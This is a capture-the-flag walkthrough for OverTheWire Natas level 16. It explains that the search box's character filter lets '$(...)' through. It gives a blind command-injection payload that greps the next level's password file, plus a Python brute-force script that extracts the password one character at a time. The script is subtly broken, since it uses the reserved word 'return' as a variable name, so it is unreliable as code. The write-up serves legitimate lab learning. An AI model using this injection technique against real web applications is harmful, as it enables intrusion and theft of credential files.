OverTheWire Natas Level 15 -> Level 16 - Walkthrough

OverTheWire Natas Solutions

Introduction

In this level, I'll give you a walkthrough to the natas wargame Level 15 -> Level 16. We will create a python script similar to the previous level and get the password for next level.

Goal

Login to natas16 and get the password for the next level.

Login details

URL - http://natas16.natas.labs.overthewire.org
Username - natas16
Password - TRD7iZrd5gATjj9PkPEuaOlfEjHqj32V

Theory

grep command is used for searching text patterns. The option '-i' is used to ignore the case for matching. Option '-E' is used in grep command to treat pattern as an extended regular expression.

Caret(^), a regular expression pattern specifies the start of a line. It is used with grep command to match the lines which start with the given string or pattern.

Similar to the previous level, we will create a python script and get the password.

Solution

Open the URL in a browser. Enter the username and password mentioned above.

The below screen appears which displays a box asking for an input and a search button.

Lets click on the "View sourcecode" to see the code.

The php code assigns the input from the user to the key variable. It then checks using the preg_match() function whether certain characters are present in the input or not and if present, displays the message that "input contains an illegal character". However, the characters '$', '(' and ')' are not filtered and therefore, we can use them to insert our command.

On entering the command in the search box, we will not get any output if the character exists in the password. So, we will discover the password if there is nothing in the output. We will inject our code in the search box like -:

$(grep -E ^c.* /etc/natas_webpass/natas17)

Write below python script and save it in your system-:

import requests
import sys
from string import digits, ascii_lowercase, ascii_uppercase
characters = ascii_lowercase + ascii_uppercase + digits
s = requests.Session()
s.auth = ('natas16', 'TRD7iZrd5gATjj9PkPEuaOlfEjHqj32V')
password = ""
while len(password) < 32:
    for c in characters:
        payload = {'needle': '$(grep -E ^%s.* /etc/natas_webpass/natas17)' % (password + c)}
        return = s.get('http://natas16.natas.labs.overthewire.org/index.php', params=payload)
        if len(return.text) == 1105:
            sys.stdout.write(c)
            sys.stdout.flush()
            password += c
            break

The above script creates the payload where it combines the password and the characters traversed by the for loop and then passes the command to the web application. If the text returned is equal to the page length then only the character is present in the password.

Run the script. After few minutes, we will get the password on the screen.

This completes the walkthrough for Level 16 as we have got the password for natas17. Please post your questions and suggestions in the comment section.